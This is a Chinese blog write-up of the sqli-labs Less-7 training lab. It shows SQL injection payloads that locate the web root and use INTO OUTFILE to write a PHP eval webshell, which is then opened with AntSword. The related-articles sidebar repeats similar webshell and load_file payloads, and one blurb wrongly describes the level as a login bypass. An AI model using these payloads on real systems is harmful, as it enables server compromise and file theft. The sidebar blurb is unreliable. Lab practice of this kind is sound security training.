Sqli-labs Less7

于 2024-07-23 19:57:07 发布
阅读量399 收藏 11
点赞数 4
分类专栏: # Sqli-labs 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beiweixiaotian66/article/details/140644809
版权

Less_7 利用into Outfile来写shell

sqli-labs 通关指南:Less 7 - 乌漆WhiteMoon )

直接用工具

image-20240716104955616

第二种

看源码

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

id被双层括号和的单引号括起来

所以,闭合为'))

image-20240716105222022

猜解到4报错

image-20240716105536619

判断数据库名的长度

image-20240716105751712

和上道布尔注入差不多

因为根据题目dump into outfile可知是让我们利用文件导入的方式进行注入,那我们下面就用这种方式来写

mysql使用secure_file_priv参数对文件读写进行限制,当参数为null的时候无法进行文件导出操作

使用show variables like '%secure%';

image-20240720182944533

所以需要设置一下

修改MySQL下的my.ini的配置文件,将secure_file_priv="/"添加到my.ini里面,注意要回到phpstudy重启一下mysql(烦死了,我就说怎么改不出来)

image-20240720184833936

然后再次查看就改好啦啦

image-20240720184704646

尝试一下,知道是单引号加上两个括号的注入

首先我们需要知道我网页所在的文件路径,可以从Less_1获取

?id=-1' union select 1,@@basedir,@@datadir--+

image-20240720185759793

@@basedir 该参数指定了MySQL的安装路径(mysql的安装目录)
@@datadir  该参数指定了MYSQL的数据文件的存放目录(就是data文件)

使用union联合查询来注入参数,写入一句话木马

?id=1')) union select 1,2,'<?php @eval($_POST["mima"]);?>' into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\1.php"--+

虽然报错,但执行成功

image-20240720190709556

然后用蚁剑连接

添加一下数据

image-20240720191126245

现在可以随意操作网页所在主机的文件了。

image-20240720191207329

Cyan1u
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【MySQL】数据备份(导出数据 / 导入数据)
.
06-28 6117
🎯导出数据🎯导入数据
select into outfilesql语句
weixin_30919235的博客
05-02 1210
SELECT INTO…OUTFILE语句把表数据导出到一个文本文件中,并用LOAD DATA …INFILE语句恢复数据。但是这种方法只能导出或导入数据的内容,不包括表的结构,如果表的结构文件损坏,则必须先恢复原来的表的结构。 一、SELECT INTO…OUTFILE语法: select * from Table into outfile '/路径/文件名'fie...
sql注入之into outfile
ljj20020718的博客
11-25 2451
sql注入之into outfile
SQL注入——into outfile的使用
weixin_54217950的博客
02-16 4723
在数据库中into outfile语句把表数据导出到一个文本文件中,那么利用这个语句,再配合满足的‘三个条件’,即可实现文件或者一句话木马导入到数据库文件的目录中。 三个条件: 1.具有root权限。 2.在数据库配置文件中的 配置项含有:secure_file_priv=''。(注意在数据库中此项默认为secure_file_priv=null)。 3.知道数据库的绝对路径。 注意:由于满足条件十分苛刻,所以很难实现。 例子 导入文件命令:http://127.0.0.1/sqli-labs-maste
mysql into outfile语法,MySQL开发进阶篇 表的数据导出(into outfile,mysqldump)
weixin_42504327的博客
03-17 4855
一.概述在数据库的日常维护中,表的导入和导出是很频繁的操作,本篇讲解如何使用导入功能,并以案例为演示。某些情况下,需要将表里的数据导出为某些符号分割的纯数据文本,而不是sql语句,比如:(1)用来作为excel显示。 (2)节省备份空间。(3)为了快速的加载数据,load data的加载速度比普通的sql加载要快20倍以上。为了满足这些应用,可以使用以下两种办法来实现。1. 方法1 into o...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3667
Mysql写入webshell
sql注入之into outfile语句写入一句话木马_sql的into outfile
code8889的博客
04-15 1075
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
MySQL 之SELECT ... INTO OUTFILE与LOAD DATA语句
热门推荐
只是甲的博客
05-28 1万+
文章目录一. SELECT ... INTO OUTFILE语句简介1.1 SELECT ... INTO OUTFILE的使用场景1.2 SELECT ... INTO OUTFILE官方文档介绍1.3 SELECT ... INTO OUTFILE语法1.4 SELECT ... INTO OUTFILE的配置二.LOAD DATA语句简介2.1 load data语句概述2.2 load data 语法2.2.1 Non-LOCAL Versus LOCAL Operation2.2.2 Input
MySQL使用SELECTI...INTO OUTFILE导出表数据
Itmastergo的博客
05-24 3671
通过对数据表的导入导出,可以实现 MySQL 数据库服务器与其它数据库服务器间移动数据。导出是指将 MySQL 数据表的数据复制到文本文件。数据导出的方式有多种,下面主要介绍使用 SELECTI...INTO OUTFILE 语句导出数据。
mysql 开发进阶篇系列 49 表的数据导出(into outfile,mysqldump)
weixin_43394129的博客
10-15 415
一.概述   在数据库的日常维护中,表的导入和导出是很频繁的操作,本篇讲解如何使用导入功能,并以案例为演示。某些情况下,需要将表里的数据导出为某些符号分割的纯数据文本,而不是sql语句,比如:(1)用来作为excel显示。 (2)节省备份空间。(3)为了快速的加载数据,load data的加载速度比普通的sql加载要快20倍以上。为了满足这些应用,可以使用以下两种办法来实现。   1. 方法1...
MySQL--loaddata infile、outfile into及mysqldump高效导入导出数据_mysql load outfile
最新发布
2301_82257317的博客
04-30 1195
本文以Windows下操作为例,Linux也是一样的方法,区别在于路径语法不同而已~ 创建一个MySQL数据库和数据表,方便进行测试~ 一、命令source实现 2.1 导入数据 (1)准备内容如下: **存放路径:**C:/Users/Administrator/Desktop/insert.sql(2)先登录到MySQL命令行 打开cmd命令窗口,登录到MySQL命令行: $ $ 输入密码: mysql >(3)执行命令导入数据: mysql> mysql> mysql> mysql> 注意如
sql注入之into outfile语句写入一句话木马
m0_63436163的博客
01-26 1700
into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;5)select
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
SQL注入漏洞(2)注入方法2之into outfile注入
weixin_51339377的博客
03-18 855
into outfile/load_file name=-1' union select 1,load_file('C:/a.txt') --+ 读取c盘下的a.txt文件 name=-1' union select 1,load_file('C:/a.txt')into outfile 'C:/phpstudy_pro/WWW/pikachu/vul/sqli/haha.txt' --+ 读取c盘的a.txt内容到自己目录下的haha.txt 这个into outfile不具备创建文件的能力...
sqli-labs Less-7
08-28
SQLi-Labs是一个用于学习和练习SQL注入的在线平台,其中包含了多个不同的注入场景。Less-7是其中的一个场景,它主要讲解的是SQL注入的基础知识。 在Less-7中,我们需要通过注入来绕过登录认证,获取到管理员的权限。具体步骤如下: 1. 打开SQLi-Labs平台,并选择Less-7场景。 2. 在登录框中输入任意用户名和密码,然后点击登录按钮。 3. 拦截登录请求,使用Burp Suite等工具修改POST请求的参数。 4. 在密码字段中尝试注入Payload,例如:'or '1'='1。 5. 发送修改后的请求,查看服务器返回的响应。 6. 如果成功绕过认证,系统会显示管理员页面。 请注意,在实际应用中,SQL注入是一种严重的安全漏洞,攻击者可以利用它来执行恶意操作。因此,保护应用程序免受SQL注入攻击至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值